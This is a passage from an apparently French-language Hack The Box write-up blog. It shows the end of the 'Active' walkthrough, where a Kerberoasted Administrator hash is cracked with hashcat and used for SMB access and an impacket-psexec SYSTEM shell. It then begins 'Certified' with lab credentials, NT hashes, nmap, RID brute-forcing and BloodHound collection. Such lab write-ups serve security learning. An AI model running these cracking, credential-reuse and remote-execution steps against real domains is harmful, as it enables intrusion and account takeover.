class="nv">$38</span>b8aa13f6ffb46cd7866c10ab7d0dc3a54117cfe4cd271fba599fa52f84b826cb94edda0fada6c386721fa3edfc10cf58b23c35cfdbd409e42d9ba81b84cab539fb285d561f7a8c15f3ee813eede43d56618635868377a8b9fe39c0708da79aebe14351a3bcf89b1d6f248a545a042772b27bd528c91df09e5b900df3b5188cd734316acd1416c63bf032540166f0e319db943dc7a099234da10956156f753927dafbb8f1c244df2b4a3c349f333a1cb6d26ae607a037b9a39a0f995f8ba811d7b8dfc58100c6b88b8493c1d85dee40d784f275c24184e727c3e55baa2fa233a28a820e5d04684b320b925588f9eb37568891bef410775ec5c001c0dbbe9b8b1acce9b7b55aa54b37367fabede080a6a270e5a79b49ff27f83f90da85a6bbe4a99210d6fb4a9d01faee68080243f6bc04131beb8111fceeedc87bbdd9168d95d3e15e262ed2a7a0bbda46c0a51bdbb32fc98bd81252f31f928e317b06a768ed51e75e58dc66b430f9638d2996944b324ea624be7fc9a24ff5b2cd4ab9ae0b156fc9747c8c7482b785815c46293b772f1d920c776b2a6aa2ab1bf815543ba5070381cd55f21b4c9b9a70172c3e637dad6e91c1e03651de9f8532e537119b2062f63c92a771ba8fe33b3ca7a674a204331d3f577bff722492b960c241a84c59f63b28b7eeba74c37db41f4d91215e3421d820b39b4a1dfd9477b885385c8bf578718ef8f8ca659818795dd182bc91f7e13afae7cf4e38cf9bb5f4e6530ec9ae3272873e706dd528e52bbedfd39de18621c71eed9556eaec0d53b7655a4b8ec5ee1e54b408f7416197e66ea5650b317deb4b50dda2d1164ce4e51d802e099dbed074edb67b9fa2cf90ae3535fbfad2be12fe224132132040e1e842355ad2783c07c376e2f97017cc84d266bb8127681edfdaae6fa0de25a3092fecb65860d22279a50db9c0f339f5ea4b21fa96007757b9099aca27c87e34403149179c77dcbe5e546db3960f768a2cccbff8fdb869b61c312357186bc803e56b76a503d9716549e53ada50aeb8eaf0018bed0449a63d4a69fb985eacb782f48e5f6c18603ce64ad7f5acc2046798a13de5c8da29e9ec5b763c63d19fdb9fc9d41fd6f704098ff0fda0220ea2ba32ada95eba169827ef9ad50c77475ef5dc45cc56063c28462a1a81786271ed6ae8505d3aca6b81aa9c1e9964a3dec3277a526a239241251a3c05bcbab5b30e596e23c189bcc442170b3b09a3e9f8b2e5d00cae47:Ticketmaster1968 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">13100</span> <span class="o">(</span>Kerberos 5, etype 23, TGS-REP<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: <span class="nv">$krb5tgs$23$*</span>Administrator<span class="nv">$ACTIVE</span>.HTB<span class="nv">$active</span>.htb/Ad...0cae47 </span></span><span class="line"><span class="cl">Time.Started.....: Sun Jan <span class="m">5</span> 01:39:10 <span class="m">2025</span> <span class="o">(</span><span class="m">1</span> sec<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Sun Jan <span class="m">5</span> 01:39:11 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/home/leopold/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: 7678.4 kH/s <span class="o">(</span>9.15ms<span class="o">)</span> @ Accel:1024 Loops:1 Thr:32 Vec:1 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests </span></span><span class="line"><span class="cl">Progress.........: 10616832/14344385 <span class="o">(</span>74.01%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/10616832 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 10321920/14344385 <span class="o">(</span>71.96%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: ahki_22 -&gt; Saboka54 </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 36c Fan: 46% Util: 23% Core:1860MHz Mem:3802MHz Bus:16 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Sun Jan <span class="m">5</span> 01:39:09 <span class="m">2025</span> </span></span><span class="line"><span class="cl">Stopped: Sun Jan <span class="m">5</span> 01:39:12 <span class="m">2025</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve le mot de passe de l&rsquo;administrateur ! Administrator:<code>Ticketmaster1968</code></p> <p>On peut maintenant se connecter en SMB et accéder au dossier de l&rsquo;adminstrateur dans le share &ldquo;USERS&rdquo; qui était bloqué auparavant. On obtient bien le flag root.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.10.100/Users -U <span class="s1">&#39;Administrator%Ticketmaster1968&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> Administrator<span class="se">\ </span></span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:21 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> AppData DHn <span class="m">0</span> Sat Jan <span class="m">4</span> 07:29:39 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> Application Data DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Contacts DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Cookies DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Desktop DR <span class="m">0</span> Thu Jan <span class="m">21</span> 11:49:47 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Documents DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Downloads DR <span class="m">0</span> Thu Jan <span class="m">21</span> 11:52:32 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Favorites DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Links DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Local Settings DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Music DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> My Documents DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NetHood DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT AHSn <span class="m">524288</span> Sat Jan <span class="m">4</span> 07:30:15 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> ntuser.dat.LOG1 AHS <span class="m">262144</span> Sat Jan <span class="m">4</span> 08:05:30 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> ntuser.dat.LOG2 AHS <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:09 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TM.blf AHS <span class="m">65536</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TMContainer00000000000000000001.regtrans-ms AHS <span class="m">524288</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> NTUSER.DAT<span class="o">{</span>016888bd-6c6f-11de-8d1d-001e0bcde3ec<span class="o">}</span>.TMContainer00000000000000000002.regtrans-ms AHS <span class="m">524288</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> ntuser.ini HS <span class="m">20</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Pictures DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> PrintHood DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Recent DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Saved Games DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Searches DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> SendTo DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Start Menu DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Templates DHSrn <span class="m">0</span> Mon Jul <span class="m">16</span> 06:14:15 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Videos DR <span class="m">0</span> Mon Jul <span class="m">30</span> 09:50:10 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">5217023</span> blocks of size 4096. <span class="m">277230</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\&gt;</span> <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> cat root.txt </span></span><span class="line"><span class="cl">cat: <span class="nb">command</span> not found </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> get root.txt </span></span><span class="line"><span class="cl">getting file <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt of size <span class="m">34</span> as root.txt <span class="o">(</span>0.5 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.5 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\&gt;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Active/bloodhound2<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat root.txt </span></span><span class="line"><span class="cl">5d2a.....fb20 </span></span></code></pre></td></tr></table> </div> </div><h3 id="administrator-shell">Administrator shell </h3><p>Grâce à l&rsquo;outil <strong>psexec.py</strong> de la suite Impacket, j&rsquo;ai pu obtenir un shell interactif avec les privilèges les plus élevés (NT AUTHORITY\SYSTEM) sur la machine cible. Cela a été possible en utilisant les identifiants de l&rsquo;utilisateur Administrator pour se connecter au partage <strong>SMB ADMIN$</strong>, uploader un exécutable temporaire, et créer un service Windows pour l&rsquo;exécuter. Une fois le service démarré, un accès complet au système a été établi, permettant un contrôle total de la machine.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ impacket-psexec Administrator:<span class="s2">&#34;Ticketmaster1968&#34;</span>@10.10.10.100 </span></span><span class="line"><span class="cl">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file lwoxkZvR.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service zfLo on 10.10.10.100..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service zfLo..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 6.1.7601<span class="o">]</span> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">2009</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; whoami </span></span><span class="line"><span class="cl">nt authority<span class="se">\s</span>ystem </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/certified-htb/Wed, 11 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/certified-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Certified cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Certified</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.41</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">User : judith.mader, Password : judith09 </span></span><span class="line"><span class="cl">User : management_svc, NT <span class="nb">hash</span> : a091c1832bcdd4677c28b5a6a1295584 </span></span><span class="line"><span class="cl">User : ca_operator, NT <span class="nb">hash</span> : 94994b74f29662fc4d702f2f3b0df327 </span></span><span class="line"><span class="cl">User : Administrator, LM/NT <span class="nb">hash</span> : aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.41 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-08 14:07 CET </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.41 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.060s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">992</span> filtered ports </span></span><span class="line"><span class="cl">PORT STATE SERVICE </span></span><span class="line"><span class="cl">53/tcp open domain </span></span><span class="line"><span class="cl">135/tcp open msrpc </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5 </span></span><span class="line"><span class="cl">636/tcp open ldapssl </span></span><span class="line"><span class="cl">3269/tcp open globalcatLDAPssl </span></span></code></pre></td></tr></table> </div> </div><h3 id="enumerating-users---smb">Enumerating Users - smb </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nxc smb 10.10.11.41 -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -d <span class="s1">&#39;certified.htb&#39;</span> --rid-brute </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC01<span class="o">)</span> <span class="o">(</span>domain:certified.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 <span class="o">[</span>+<span class="o">]</span> certified.htb<span class="se">\j</span>udith.mader:judith09 </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 498: CERTIFIED<span class="se">\E</span>nterprise Read-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 500: CERTIFIED<span class="se">\A</span>dministrator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 501: CERTIFIED<span class="se">\G</span>uest <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 502: CERTIFIED<span class="se">\k</span>rbtgt <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 512: CERTIFIED<span class="se">\D</span>omain Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 513: CERTIFIED<span class="se">\D</span>omain Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 514: CERTIFIED<span class="se">\D</span>omain Guests <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 515: CERTIFIED<span class="se">\D</span>omain Computers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 516: CERTIFIED<span class="se">\D</span>omain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 517: CERTIFIED<span class="se">\C</span>ert Publishers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 518: CERTIFIED<span class="se">\S</span>chema Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 519: CERTIFIED<span class="se">\E</span>nterprise Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 520: CERTIFIED<span class="se">\G</span>roup Policy Creator Owners <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 521: CERTIFIED<span class="se">\R</span>ead-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 522: CERTIFIED<span class="se">\C</span>loneable Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 525: CERTIFIED<span class="se">\P</span>rotected Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 526: CERTIFIED<span class="se">\K</span>ey Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 527: CERTIFIED<span class="se">\E</span>nterprise Key Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 553: CERTIFIED<span class="se">\R</span>AS and IAS Servers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 571: CERTIFIED<span class="se">\A</span>llowed RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 572: CERTIFIED<span class="se">\D</span>enied RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1000: CERTIFIED<span class="se">\D</span>C01$ <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1101: CERTIFIED<span class="se">\D</span>nsAdmins <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1102: CERTIFIED<span class="se">\D</span>nsUpdateProxy <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1103: CERTIFIED<span class="se">\j</span>udith.mader <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1104: CERTIFIED<span class="se">\M</span>anagement <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1105: CERTIFIED<span class="se">\m</span>anagement_svc <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1106: CERTIFIED<span class="se">\c</span>a_operator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1601: CERTIFIED<span class="se">\a</span>lexander.huges <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1602: CERTIFIED<span class="se">\h</span>arry.wilson <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.41 <span class="m">445</span> DC01 1603: CERTIFIED<span class="se">\g</span>regory.cameron <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound-python">Bloodhound-python </h3><p>On execute bloodhound-python pour récupérer des données sur l&rsquo;Active directory.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo bloodhound-python -d CERTIFIED.HTB -u <span class="s1">&#39;judith.mader&#39;</span> -p <span class="s1">&#39;judith09&#39;</span> -dc certified.htb -c All --zip -ns 10.10.11.41 </span></span><span class="line"><span class="cl">INFO: Found AD domain: certified.htb </span></span><span class="line"><span class="cl">INFO: Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl">WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW<span class="o">(</span>Clock skew too great<span class="o">)</span> </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> domains in the forest </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> computers </span></span><span class="line"><span class="cl">INFO: Connecting to LDAP server: certified.htb </span></span><span class="line"><span class="cl">INFO: Found <span class="m">10</span> users </span></span><span class="line"><span class="cl">INFO: Found <span class="m">53</span> groups </span></span><span class="line"><span class="cl">INFO: Found <span class="m">2</span> gpos </span></span><span class="line"><span class="cl">INFO: Found <span class="m">1</span> ous </span></span><span class="line"><span class="cl">INFO: Found <span class="m">19</span> containers </span></span><span class="line"><span class="cl">INFO: Found <span class="m">0</span> trusts </span></span><span class="line"><span class="cl">INFO: Starting computer enumeration with <span class="m">10</span> workers </span></span><span class="line"><span class="cl">INFO: Querying computer: </span></span><span class="line"><span class="cl">INFO: Querying computer: DC01.certified.htb </span></span><span class="line"><span class="cl">INFO: Done in 00M 07S </span></span><span class="line"><span class="cl">INFO: Compressing output into 20241208115439_bloodhound.zip </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 